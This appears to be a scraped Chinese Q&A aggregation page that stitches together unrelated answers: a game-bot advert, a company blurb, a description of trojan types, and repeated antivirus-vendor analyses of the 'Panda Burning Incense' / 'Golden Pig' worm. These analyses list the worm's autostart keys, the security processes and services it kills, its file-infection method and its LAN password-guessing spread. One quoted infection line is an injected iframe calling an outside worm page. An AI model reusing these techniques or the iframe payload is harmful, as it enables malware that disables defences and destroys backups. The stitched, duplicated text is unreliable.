金猪脚本编译exe

① 蓝月传奇金猪送礼的脚本哪找

那就直接用爱蜂窝吧，它实现云端挂机 ，功能强大。一段难忘的回忆、一段热血的记忆、一条命运的项链、一个不朽的传奇，在传奇这款游戏里面，有难忘的友情，有热血的PK，更有我们无数美好的回忆，我们都不能接受它那悲苍的命运，难道重生一次就还要走那条老路吗?不!绝不!我要让它成为真正的传奇!真正的永恒!

② 在“熊猫烧香”盛行的年代，是因为人们都不装杀毒软件，还是杀毒软件杀不了它

“熊猫烧香”，是由李俊制作并肆虐网络的一款电脑病毒，熊猫烧香跟灰鸽子不同，是一款拥有自动传播、自动感染硬盘能力和强大的破坏能力的病毒，它不但能感染系统中exe，com，pif，src，html，asp等文件，它还能终止大量的反病毒软件进程并且会删除扩展名为gho的文件（该类文件是一系统备份工具“GHOST”的备份文件，删除后会使用户的系统备份文件丢失）。
被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。2006年10月16日由25岁的湖北武汉新洲区人李俊编写，2007年1月初肆虐网络，它主要通过下载的文件传染。2007年2月12日，湖北省公安厅宣布，李俊以及其同伙共8人已经落网，这是中国警方破获的首例计算机病毒大案。2014年，张顺、李俊被法院以开设赌场罪分别判处有期徒刑五年和三年，并分别处罚金20万元和8万元。
中文名
熊猫烧香
外文名
Worm.WhBoy.cw
程序类别
蠕虫病毒
感染系统
Win9x/NT/2000/ME/XP/2003/Vista
制作人
李俊
快速
导航
运行过程特点原理传播方法影响危害应对方案
发展沿革
2006年12月，一种被称为“尼姆亚”新型病毒在互联网上大规模爆发。
2006年12月份—2007年1月30日，变种数已达90多个，个人用户感染熊猫烧香的已经高达几百万，企业用户感染数还在继续上升[1]。
2007年1月7日，国家计算机病毒应急处理中心发出“熊猫烧香”的紧急预警。
2007年1月9日，湖北仙桃市公安局接报，该市“江汉热线”不幸感染“熊猫烧香”病毒而致网络瘫痪。
2007年1月31日下午，各路专家齐聚省公安厅，对“1·22”案进行“会诊”，同时成立联合工作专班。
2007年2月3日，回出租屋取东西准备潜逃的李俊被当场抓获。随后将其同伙雷磊抓获归案。[2]
2007年9月24日，“熊猫烧香”计算机病毒制造者及主要传播者李俊等4人，被湖北省仙桃市人民法院以破坏计算机信息系统罪判处李俊有期徒刑四年、王磊有期徒刑二年六个月、张顺有期徒刑二年、雷磊有期徒刑一年，并判决李俊、王磊、张顺的违法所得予以追缴，上缴国库；被告人李俊有立功表现，依法可以从轻处罚。[2]
2012年1月29日，金山毒霸反病毒中心称：“熊猫烧香”化身“金猪报喜”，危害指数再度升级。[3]
2013年6月，据浙江省丽水市人民政府官方微博“丽水发布”提供的消息称，“熊猫烧香”病毒制造者张顺、李俊因设立“金元宝棋牌”网络赌场，非法敛财数百万元，已经被丽水市莲都区检察院批准逮捕。
运行过程
磁盘感染
熊猫烧香病毒对系统中所有除了盘符为A，B的磁盘类型为DRⅣE_REMOTE，DRⅣE_FⅨED的磁盘进行文件遍历感染
熊猫烧香
注：不感染文件大小超过10MB以上的
（病毒将不感染如下目录的文件）：
Microsoft Frontpage
Movie Maker
MSN Gamin Zone
Common Files
Windows NT
Recycled
System Volume Information
Documents and Settings
……
（病毒将不感染文件名如下的文件）：
setup.exe
病毒将使用两类感染方式应对不同后缀的文件名进行感染
1）二进制可执行文件（后缀名为：EXE,SCR,PIF,COM）: 将感染目标文件和病毒溶合成一个文件（被感染文件贴在病毒文件尾部）完成感染.
2）脚本类（后缀名为：htm,html,asp,php,jsp,aspx）: 在这些脚本文件尾加上如下链接（下边的页面存在安全漏洞）：
<iframe src=></iframe>
在感染时会删除这些磁盘上的后缀名为.GHO的Ghost备份文件
生成文件
病毒建立一个计时器，以6秒为周期在磁盘的根目录下生成setup.exe（病毒本身）autorun.inf，并利用AutoRun Open关联使病毒在用户点击被感染

③ 河南金猪人工智能有限公司的自动化办公怎么用啊

金猪脚本(原飞猪脚本)是河南金猪人工智能有限公司旗下脚本开发团队,位于誉满全国的中华龙乡、中原油田濮阳电商产业园.本团队主要从事人工智能领域的软件研发与服务,有数十名擅长JAVA,R语言,C语言,C#,易语言,python,lua,按键精灵,UiBot等高级软件工程师,并有擅长Pr,Ps,Flash等专业领域的设计人员,打造一个系统全面专业高效的编程指导体系,积极响应人工智能全民编程号召,为国家发展略尽绵薄之力。
本公司的有多种自动化办公产品：涵盖人工智能领域的智能设备、计算机领域内的自动化脚本、智能移动设备的自动化app等。每种产品的使用方法都有参考说明。
最后感谢使用本公司的产品，祝您生活愉快，工作顺利

④ 现在的金猪报喜什么病毒，有什么危害

“金猪报喜”，是“熊猫烧香”病毒的一个变种，它的危害程度明显高，不但导致被感染系统瘫痪，还会试图感染区域网内其他机器，形成大规模扩散。貌似可爱的“金猪”将成为春节前最危险的计算机病毒。

据介绍，这个病毒能感染系统中exe，com，pif，src，html，asp，jsp等文件，被感染的电脑将是“金猪满圈”，当应用程序图标变成讨喜的“金猪报喜”时，也意味着整个系统几近崩溃。专家介绍，这种病毒破坏力很强，给用户的电脑系统造成巨大的危害，将导致大量应用软件无法应用。

该病毒运行后，会把自身复制为sppoolsv.exe病毒文件。同时修改注册表，实现随开机自动启动。此外，它会有频率地搜寻并终止各个杀毒软件的进程等相关信息。此外，它会感染扩展名为exe，pif，com，src的文件，将金猪头像粘贴上去，还会试图感染区域网内其他机器，造成大规模地扩散。

代码不了解。

⑤ 蠕虫病毒的熊猫烧香

病毒名称：熊猫烧香

Worm.WhBoy.（金山称），Worm.Nimaya. （瑞星称）
病毒别名：尼姆亚，武汉男生，后又化身为“金猪报喜”，国外称“熊猫烧香”
危险级别：★★★★★
病毒类型：蠕虫病毒，能够终止大量的反病毒软件和防火墙软件进程。
影响系统：Win 9x/ME、Win 2000/NT、Win XP、Win 2003 、Win Vista
发现时间：2006年10月16日
来源地：中国武汉东湖高新技术开发区关山
“熊猫烧香”还可以通过共享文件夹、系统弱口令等多种方式进行传播。
金山分析：这是一个感染型的蠕虫病毒，它能感染系统中exe,com,pif,src,html,asp等文件，它还能中止大量的反病毒软件进程
1拷贝文件
病毒运行后，会把自己拷贝到
C:WINDOWSSystem32Driversspoclsv.exe
2添加注册表自启动
病毒会添加自启动项
HKEY_CURRENT_
svcshare ->C:WINDOWSSystem32Driversspoclsv.exe
3病毒行为
a：每隔1秒
寻找桌面窗口，并关闭窗口标题中含有以下字符的程序
QQKav
QQAV
防火墙
进程
VirusScan
网镖
杀毒
毒霸
瑞星
江民
黄山IE
超级兔子
优化大师
木马克星
木马清道夫
QQ病毒
注册表编辑器
系统配置实用程序
卡巴斯基反病毒
Symantec AntiVirus
Duba
esteem proces
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戏木马检测大师
msctls_statusbar32
pjf(ustc)
IceSword
并使用的键盘映射的方法关闭安全软件IceSword
添加注册表使自己自启动
HKEY_CURRENT_
svcshare ->C:WINDOWSSystem32Driversspoclsv.exe
并中止系统中以下的进程：
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
kvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
b：每隔18秒
点击病毒作者指定的网页，
并用命令行检查系统中是否存在共享
共享存在的话就运行net share命令关闭admin$共享
c：每隔10秒
下载病毒作者指定的文件，
并用命令行检查系统中是否存在共享
共享存在的话就运行net share命令关闭admin$共享
d：每隔6秒
删除安全软件在注册表中的键值
HKEY_LOCAL_
RavTask
KvMonXP
kav
KAVPersonal50
McAfeeUpdaterUI
Network Associates Error Reporting Service
ShStartEXE
YLive.exe
yassistse
并修改以下值不显示隐藏文件
HKEY_LOCAL_denSHOWALL
CheckedValue -> 0x00
删除以下服务：
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc
e：感染文件
病毒会感染扩展名为exe,pif,com,src的文件，把自己附加到文件的头部
并在扩展名为htm,html,asp,php,jsp,aspx的文件中添加一网址，
用户一但打开了该文件，IE就会不断的在后台点击写入的网址，达到
增加点击量的目的，但病毒不会感染以下文件夹名中的文件：
WINDOW
Winnt
System Volume Information
Recycled
Windows NT
WindowsUpdate
Windows Media Player
Outlook Express
Internet Explorer
NetMeeting
Common Files
ComPlus Applications
Messenger
InstallShield Installation Information
MSN
Microsoft Frontpage
Movie Maker
MSN Gamin Zone
g：删除文件
病毒会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件
使用户的系统备份文件丢失.
瑞星最新病毒分析报告：“Nimaya（熊猫烧香）”
这是一个传染型的DownLoad 使用Delphi编写 蠕虫病毒的一般防治方法是：使用具有实时监控功能的杀毒软件，防范邮件蠕虫的最好办法 ，就是提高自己的安全意识，不要轻易打开带有附件的电子邮件。另外，可以启用瑞星杀毒软件的“邮件发送监控”和“邮件接收监控”功能，也可以提高自己对病毒邮件的防护能力。
从2004年起，MSN 、QQ等聊天软件开始成为蠕虫病毒传播的途径之一。“性感烤鸡”病毒就通过MSN软件传播，在很短时间内席卷全球，一度造成中国大陆地区部分网络运行异常。
对于普通用户来讲，防范聊天蠕虫的主要措施之一，就是提高安全防范意识，对于通过聊天软件发送的任何文件，都要经过好友确认后再运行；不要随意点击聊天软件发送的网络链接。
病毒并不是非常可怕的，网络蠕虫病毒对个人用户的攻击主要还是通过社会工程学，而不是利用系统漏洞！所以防范此类病毒需要注意以下几点：
1、选购合适的杀毒软件。网络蠕虫病毒的发展已经使传统的杀毒软件的“文件级实时监控系统”落伍，杀毒软件必须向内存实时监控和邮件实时监控发展！另外，面对防不胜防的网页病毒，也使得用户对杀毒软件的要求越来越高！
2、经常升级病毒库，杀毒软件对病毒的查杀是以病毒的特征码为依据的，而病毒每天都层出不穷，尤其是在网络时代，蠕虫病毒的传播速度快、变种多，所以必须随时更新病毒库，以便能够查杀最新的病毒。3、提高防杀毒意识。不要轻易去点击陌生的站点，有可能里面就含有恶意代码！
当运行IE时，点击“工具→Internet选项→安全→ Internet区域的安全级别”，把安全级别由“中”改为“高” 。因为这一类网页主要是含有恶意代码的ActiveX或Applet、 JavaScript的网页文件 ，所以在IE设置中将ActiveX插件和控件、Java脚本等全部禁止，就可以大大减少被网页恶意代码感染的几率。具体方案是：在IE窗口中点击“工具”→“Internet选项”，在弹出的对话框中选择“安全”标签，再点击“自定义级别”按钮，就会弹出“安全设置”对话框，把其中所有ActiveX插件和控件以及与Java相关全部选项选择“禁用”。但是，这样做在以后的网页浏览过程中有可能会使一些正常应用ActiveX的网站无法浏览。
4、不随意查看陌生邮件，尤其是带有附件的邮件。由于有的病毒邮件能够利用ie和outlook的漏洞自动执行，所以计算机用户需要升级ie和outlook程序，及常用的其他应用程序。
最新蠕虫病毒“蒙面客”被发现，可泄漏用户隐私

⑥ 我的电脑像是中病毒了，表现为exe文件被感染，还有进程打开了就瞬间关闭，运行注册表也没反应怎么办啊

中熊猫病毒了

熊猫烧香专杀工具

经测试可顺利删除熊猫烧香病毒，请放心使用

名称： 熊猫烧香专杀工具
版本： v3.7
大小： 148 KB
（此工具完全免费）

使用方法：先确定您是否已经中毒，如果已经中毒，直接运行专杀工具将会失败，病毒会阻止程序启动，请重启系统，按F8，选择安全模式，在安全模式中运行专杀工具即可。

更新时间：2007-1-26

熊猫烧香专杀工具介绍：

1、全面查杀"烧香"病毒
2、彻底清除目前所有的熊猫病毒以及熊猫变种
3、一键恢复，冷静面对
4、文件小巧，轻松下载
5、有效得保护您的电脑不受烧香病毒的侵害

立即下载熊猫烧香专杀工具

熊猫烧香病毒介绍

导语：这是一波电脑病毒蔓延的狂潮。在两个多月的时间里，数百万电脑用户被卷将进去，那只憨态可掬、颔首敬香的“熊猫”除而不尽。反病毒工程师们将它命名为“尼姆亚”。它还有一个更通俗的名字—“熊猫烧香”。

一个感染型的蠕虫病毒，它能感染系统中exe,com,pif,src,html,asp等文件，中止绝大部分的杀毒软件进程，并且会删除扩展为gho的文件，该文件是一系统备份工具GHOST的备份文件，最终使电脑用户的系统文件丢失，导致无法正常使用。

被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。（如上图）

“熊猫”病毒泛滥成灾，已经到了天怒人怨的地步。据不完全统计，国内感染“熊猫”病毒的企业已接近千家，其中外企用户居多，个人用户更是不计其数，损失惨重。

“熊猫烧香”病毒不但可以对用户系统进行破坏，导致大量应用软件无法使用，而且还可删除扩展名为gho的所有文件，造成用户的系统备份文件丢失，从而无法进行系统恢复；同时该病毒还能终止大量反病毒软件进程，大大降低用户系统的安全性。

中毒现象

1、在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。

2、无法手工修改“文件夹选项”将隐藏文件显示出来。

3、在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16

4、电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>

5、中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。

6、不能正常使用任务管理器，SREng.exe等工具。

7、无故的向外发包，连接局域网中其他机器。

注意：如果您发现电脑系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样，您可能已经感染熊猫病毒，请立即下载专杀工具进行查杀！

媒体报道：
熊猫病毒化身"金猪"毒性大发 密谋大闹春节
“熊猫烧香”被疑幕后黑手推动
熊猫烧香病毒攻击千家网站 作者留名武汉男孩
Copyright 2007 www.shaoxiang.org | 网友搭建的熊猫烧香专题站

⑦ 我想开发一个软件，跟熊猫烧香差不多，运行后exe图标全部变成我自己设置的图标。要用易语言写求源码

病毒简介

熊猫烧香（病毒将不感染文件名如下的文件）：

setup.exe

病毒将使用两类感染方式应对不同后缀的文件名进行感染

1）二进制可执行文件（后缀名为：EXE,SCR,PIF,COM): 将感染目标文件和病毒溶合成一个文件（被感染文件贴在病毒文件尾部）完成感染.

2）脚本类（后缀名为：htm,html,asp,php,jsp,aspx): 在这些脚本文件尾加上如下链接（下边的页面存在安全漏洞）：

<iframe src=></iframe>

在感染时会删除这些磁盘上的后缀名为.GHO的Ghost备份文件

生成文件

病毒建立一个计时器，以6秒为周期在磁盘的根目录下生成setup.exe（病毒本身）autorun.inf，并利用AutoRun Open关联使病毒在用户点击被感染磁盘时能被自动运行。

局域网传播

病毒生成随机个局域网传播线程实现如下的传播方式：

当病毒发现能成功联接攻击目标的139或445端口后，将使用内置的一个用户列表及密码字典进行联接（猜测被攻击端的密码）。当成功联接上以后将自己复制过去，并利用计划任务启动激活病毒。

修改操作系统的启动关联

下载文件启动

与杀毒软件对抗

⑧ 木马有几种启动方式

键盘记录木马

这个特洛伊木马很简单。他们只做一件事，那就是记录受害者的键盘击键，并在LOG文件中找到密码，然后由Windows启动来启动它。他们具有在线和离线记录选项，当您在在线和离线状态下敲击键盘时，可以记录击键，以便您可以按一下按钮，黑客就可以从记录中知道，并且很容易就可以将您从它。有用的信息，例如密码，甚至您的信用卡帐户！当然，对于这种类型的特洛伊木马，许多都具有邮件发送功能，它将自动将密码发送到黑客指定的邮箱。

DoS攻击木马

当黑客入侵计算机并向其发出DoS攻击木马时，此计算机将不会反映在受感染的计算机中，而不是计算机中。受攻击控制的肉鸡数量越多，发起Dos攻击的可能性就越大。黑客使用它来攻击一台计算机，从而对网络造成巨大的破坏和损失。

还有一个类似DoS的木马，称为邮件炸弹木马。一旦机器被感染，特洛伊木马程序将随机生成各种主题的信件，并将继续向特定的邮箱发送电子邮件，直到对方感到尴尬并且无法接受邮件为止。

FTP木马

该木马可能是最简单，最古老的木马。它的唯一功能是打开21入口并等待用户连接。现在，新的FTP木马还增加了密码功能，以便只有攻击者才能知道正确的密码并进入另一台计算机。

反弹端口型木马

在分析了防火墙的特征之后，特洛伊木马开发人员发现防火墙通常对连接的链接执行非常严格的过滤，但是撤离了所连接的链接。与典型的Trojan相比，退回端口Trojan的服务器（控制台）使用主动端口，而客户端（控制台）使用被动端口。通常在80时开放，即使用户使用扫描软件检查自己的端口，他们也会发现类似的TCPUserIP：1026控制器IP：80ESTABLISHED的情况，有点疏忽，会认为他们正在浏览Web，因为正在浏览网络将打开80。

特洛伊木马

对于黑客而言，在入侵时掩盖自己的足迹非常重要。防止发现其身份非常重要。因此，代理特洛伊木马程序最重要的任务是为受控肉鸡种下特洛伊木马并将其转变为攻击者。。通过代理特洛伊木马，攻击者可以在匿名情况下使用Telnet，ICQ，IRC等隐藏自己的踪迹。

程序杀手木马

尽管以上木马的功能多种多样，但既要在另一台机器上发挥自己的作用，又要防范木马软件。常见的反木马软件是ZoneAlarm，NortonAnti－Virus等。程序杀手Trojan的功能是关闭在另一台计算机上运行的此类程序，以便其他Trojans可以更好地工作。

(8)金猪脚本编译exe扩展阅读：

检测和寻找木马隐藏的位置

木马侵入系统后，需要找一个安全的地方选择适当时机进行攻击，了解和掌握木马藏匿位置，才能最终清除木马。木马经常会集成到程序中、藏匿在系统中、伪装成普通文件或者添加到计算机操作系统中的注册表中，还有嵌入在启动文件中，一旦计算机启动，这些木马程序也将运行。

安装防火墙

防火墙在计算机系统中起着不可替代的作用，它保障计算机的数据流通，保护着计算机的安全通道，对数据进行管控可以根据用户需要自定义，防止不必要的数据流通。安装防火墙有助于对计算机病毒木马程序的防范与拦截。

⑨ 谁知道 熊猫烧香着个病毒啊

这不是病毒,是自定义表情,想了解更多关于熊猫烧香这个病毒吗,看下面:
瑞星: [快讯] 1月12号，瑞星全球反病毒监测网向企业局域网发布警告，目前“尼姆亚（也称熊猫烧香）”病毒的攻击重点正在转向企业局域网和网站，广大企业和网站应提高警惕紧密防范。瑞星反病毒专家介绍说，该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。一些网站编辑人员的电脑如果被该病毒感染，上传网页到网站后，就会导致用户浏览这些网站时也被病毒感染。

据悉，目前多家着名网站已经遭到此类攻击，而相继被植入病毒。由于这些网站的浏览量非常大，致使此次“熊猫烧香”病毒的感染范围非常广，中毒企业和政府机构已经超过千家，其中不乏金融、税务、能源等关系到国计民生的重要单位。

瑞星反病毒专家介绍说，“熊猫烧香”其实是“尼姆亚”病毒的新变种，最早出现在2006年的11月，到目前为止已经有数十个不同变种，在此期间瑞星已经发布针对该病毒的专杀工具，今天该工具已经升级，用户可以去瑞星网站（http://it.rising.com.cn/Channels/Service/index.shtml）免费下载使用。

除了通过网站带毒感染用户之外，此病毒还会在局域网中传播，在极短时间之内就可以感染几千台计算机，严重时可以导致网络瘫痪。中毒电脑上会出现“熊猫烧香”图案，所以也被称为“熊猫烧香”病毒。中毒电脑会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

那么，用户应该如何防范“熊猫烧香”病毒的攻击？专家建议：

第一，安装杀毒软件和瑞星卡卡3.1，并在上网时打开网页实时监控。由于现在海底光缆中断，很多国外杀毒软件难以升级，瑞星杀毒软件免费为用户提供一个月服务，可以登陆：http://www.rising.com.cn 免费下载并使用。用户还可以通过瑞星在线专家门诊：http://help.rising.com.cn取得帮助。

第二，网站管理员应该更改机器密码，以防止病毒通过局域网传播。

第三，QQ、UC的漏洞已经被该病毒利用，用户应该去他们的官方网站打好最新补丁。

第四，该病毒会利用IE浏览器的漏洞进行攻击，因此用户应该给IE打好所有的补丁。如果必要的话，用户可以暂时换用Firefox、Opera等比较安全的浏览器。
江民:病毒名称：Worm.WhBoy.h
病毒中文名：熊猫烧香(武汉男生)，近日又化身为“金猪报喜”

病毒类型：蠕虫

危险级别：★★★★★

影响平台：Win 9x/ME,Win 2000/NT,Win XP,Win 2003

专杀工具：金山专杀工具 安天专杀工具 江民专杀工具 安博士专杀工具 赛门铁克专杀工具

病毒描述：

“武汉男生”，俗称“熊猫烧香”，这是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件，使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

1:拷贝文件

病毒运行后,会把自己拷贝到C:\WINDOWS\System32\Drivers\spoclsv.exe

2:添加注册表自启动

病毒会添加自启动项HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

3:病毒行为

a:每隔1秒寻找桌面窗口,并关闭窗口标题中含有以下字符的程序：

QQKav、QQAV、防火墙、进程、VirusScan、网镖、杀毒、毒霸、瑞星、江民、黄山IE、超级兔子、优化大师、木马克星、木马清道夫、QQ病毒、注册表编辑器、系统配置实用程序、卡巴斯基反病毒、Symantec AntiVirus、Duba、esteem proces、绿鹰PC、密码防盗、噬菌体、木马辅助查找器、System Safety Monitor、Wrapped gift Killer、Winsock Expert、游戏木马检测大师、msctls_statusbar32、pjf(ustc)、IceSword

并使用的键盘映射的方法关闭安全软件IceSword

添加注册表使自己自启动 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

并中止系统中以下的进程:

Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe

b:每隔18秒点击病毒作者指定的网页,并用命令行检查系统中是否存在共享，共存在的话就运行net share命令关闭admin$共享

c:每隔10秒下载病毒作者指定的文件,并用命令行检查系统中是否存在共享，共存在的话就运行net share命令关闭admin$共享

d:每隔6秒删除安全软件在注册表中的键值

并修改以下值不显示隐藏文件 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue -> 0x00

删除以下服务:

navapsvc、wscsvc、KPfwSvc、SNDSrvc、ccProxy、ccEvtMgr、ccSetMgr、SPBBCSvc、Symantec Core LC、NPFMntor MskService、FireSvc

e:感染文件

病毒会感染扩展名为exe,pif,com,src的文件,把自己附加到文件的头部，并在扩展名为htm,html, asp,php,jsp,aspx的文件中添加一网址，用户一但打开了该文件，IE就会不断的在后台点击写入的网址，达到增加点击量的目的,但病毒不会感染以下文件夹名中的文件：

WINDOW、Winnt、System Volume Information、Recycled、Windows NT、WindowsUpdate、Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、Common Files、ComPlus Applications、Messenger、InstallShield Installation Information、MSN、Microsoft Frontpage、Movie Maker、MSN Gamin Zone

g:删除文件

病毒会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件使用户的系统备份文件丢失。

⑩ 金猪病毒专杀工具哪里有得下载要最新的

金猪报喜病毒实际就是最近熊猫烧香的新变种

瑞星熊猫烧香专杀工具
http://www.p234.com/Soft/cygj/200612/66.html

江民熊猫烧香专杀工具
http://www.p234.com/Soft/rjxz/200612/68.html

再不行就用下面这个！

超级巡警强化熊猫烧香专杀 (Anti-Spyware toolkit) 2.7.0
熊猫烧香病毒专杀升级至1.6,超级巡警全面监测熊猫烧香.可查杀熊猫烧香病毒变种
下载地址：
http://www.p234.com/Soft/rjxz/200701/72.html

熊猫烧香(武汉男生)，近日又化身为“金猪报喜”

其他熊猫烧香专杀工具下载 安天熊猫烧香专杀工具,安博士熊猫烧香专杀工具,赛门铁克熊猫烧香专杀工具
http://blog.phoenixtv.com/user3/aimeng/archives/2007/642388.html

病毒描述：

“武汉男生”，俗称“熊猫烧香”，这是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件，使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

1:拷贝文件

病毒运行后,会把自己拷贝到C:\WINDOWS\System32\Drivers\spoclsv.exe

2:添加注册表自启动

病毒会添加自启动项HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

3:病毒行为

a:每隔1秒寻找桌面窗口,并关闭窗口标题中含有以下字符的程序：

QQKav、QQAV、防火墙、进程、VirusScan、网镖、杀毒、毒霸、瑞星、江民、黄山IE、超级兔子、优化大师、木马克星、木马清道夫、QQ病毒、注册表编辑器、系统配置实用程序、卡巴斯基反病毒、Symantec AntiVirus、Duba、esteem proces、绿鹰PC、密码防盗、噬菌体、木马辅助查找器、System Safety Monitor、Wrapped gift Killer、Winsock Expert、游戏木马检测大师、msctls_statusbar32、pjf(ustc)、IceSword

并使用的键盘映射的方法关闭安全软件IceSword

添加注册表使自己自启动 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

并中止系统中以下的进程:

Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe

b:每隔18秒点击病毒作者指定的网页,并用命令行检查系统中是否存在共享，共存在的话就运行net share命令关闭admin$共享

c:每隔10秒下载病毒作者指定的文件,并用命令行检查系统中是否存在共享，共存在的话就运行net share命令关闭admin$共享

d:每隔6秒删除安全软件在注册表中的键值

并修改以下值不显示隐藏文件 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue -> 0x00

删除以下服务:

navapsvc、wscsvc、KPfwSvc、SNDSrvc、ccProxy、ccEvtMgr、ccSetMgr、SPBBCSvc、Symantec Core LC、NPFMntor MskService、FireSvc

e:感染文件

病毒会感染扩展名为exe,pif,com,src的文件,把自己附加到文件的头部，并在扩展名为htm,html, asp,php,jsp,aspx的文件中添加一网址，用户一但打开了该文件，IE就会不断的在后台点击写入的网址，达到增加点击量的目的,但病毒不会感染以下文件夹名中的文件：

WINDOW、Winnt、System Volume Information、Recycled、Windows NT、WindowsUpdate、Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、Common Files、ComPlus Applications、Messenger、InstallShield Installation Information、MSN、Microsoft Frontpage、Movie Maker、MSN Gamin Zone

g:删除文件

病毒会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件使用户的系统备份文件丢失。